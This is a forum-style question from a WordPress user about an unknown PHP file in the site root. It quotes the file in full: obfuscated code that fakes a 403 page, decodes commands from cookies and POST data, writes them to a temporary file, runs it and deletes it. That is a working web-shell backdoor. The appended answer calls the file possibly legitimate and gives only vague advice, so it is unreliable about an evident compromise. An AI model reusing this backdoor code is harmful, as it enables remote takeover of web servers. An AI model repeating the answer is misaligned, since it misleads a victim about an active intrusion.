John Davidson

php - New file appeared on root folder. Is it for wordpress?


I'm new to wordpress and do not fully understand which files of wordpress are its own and which are not. Theres a file on root folder by the name b5tzvh8n.php with the following content:

if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
function z1($f2){$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;$z5='';foreach($f2 as $v4){$z5.=$b3[$v4];}return $z5;}$p6 = Array();$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));foreach ($p6[8]($_COOKIE, $_POST) as $m14 => $e11){function r8($p6, $m14, $y10){return $p6[11]($p6[9]($m14 . $p6[0], ($y10 / $p6[13]($m14)) + 1), 0, $y10);}function x7($p6, $u12){return @$p6[14]($p6[3], $u12);}function y9($p6, $u12){if (isset($u12[2])) {$s13 = $p6[4] . $p6[15]($p6[0]) . $p6[2];@$p6[7]($s13, $p6[6] . $p6[1] . $u12[1]($u12[2]));@include($s13);@$p6[12]($s13);exit();}}$e11 = x7($p6, $e11);y9($p6, $p6[10]($p6[5], $e11 ^ r8($p6, $m14, $p6[13]($e11))));}

What is the purpose of this file?

My Answer:
It is difficult to determine if the file b5tzvh8n.php is related to WordPress without more information. It is possible that it could be a legitimate file used by WordPress or it could be a malicious file added by an attacker.

If you are unsure about the file, it is best to err on the side of caution and investigate further. You can check the file's contents to see if it contains any suspicious code or functions. You can also check the file's creation date and permissions to see if they match up with other WordPress files.

If you are still unsure, you may want to consider reaching out to a WordPress developer or security expert for assistance in determining the file's purpose and whether it poses any security risks to your website.

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